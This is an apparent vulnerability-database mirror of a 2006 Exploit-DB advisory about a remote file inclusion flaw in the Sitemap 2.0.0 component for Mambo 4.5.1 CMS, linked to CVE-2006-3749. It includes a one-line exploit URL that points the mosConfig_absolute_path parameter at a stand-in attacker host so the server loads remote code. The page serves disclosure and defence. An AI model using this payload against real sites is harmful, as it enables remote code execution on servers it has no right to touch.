Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbMatdhuleEDB-ID:2028
HistoryJul 17, 2006 - 12:00 a.m.

Mambo Component Sitemap 2.0.0 - Remote File Inclusion

2006-07-1700:00:00
Matdhule
www.exploit-db.com
310

AI Score

7.4

Confidence

Low

JSON
# Sitemap 2.0.0 for Mambo 4.5.1 CMS

Author          : Ahmad Maulana a.k.a Matdhule
Date            : July 12th 2006
Location        : Indonesia, Jakarta
Web             : http://advisories.echo.or.id/adv/adv38-matdhule-2006.txt
Critical Lvl    : Highly critical
Impact          : System access
Where           : From Remote
------------------------------------------------------------------------ 

Application    : Sitemap 2.0.0 for Mambo 4.5.1 CMS
Version        : Sitemap 2.0.0
URL        : http://mamboxchange.com/frs/download.php/6463/sitemap20.zip

Exploit:
http://[target]/[path]/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://attacker.com/evil.txt? 

# milw0rm.com [2006-07-17]

Related

cvelist 1
nvd 1
cve 1
nessus 1
cvelist
cvelist
CVE-2006-3749
2006-07-20 23:00:00
nvd
nvd
CVE-2006-3749
2006-07-21 14:03:00
cve
cve
CVE-2006-3749
2006-07-21 14:03:00
nessus
nessus
Mambo / Joomla! Component / Module 'mosConfig_absolute_path' Multiple Parameter Remote File Include Vulnerabilities
2006-07-15 00:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:2028
cvelist1nvd1cve1nessus1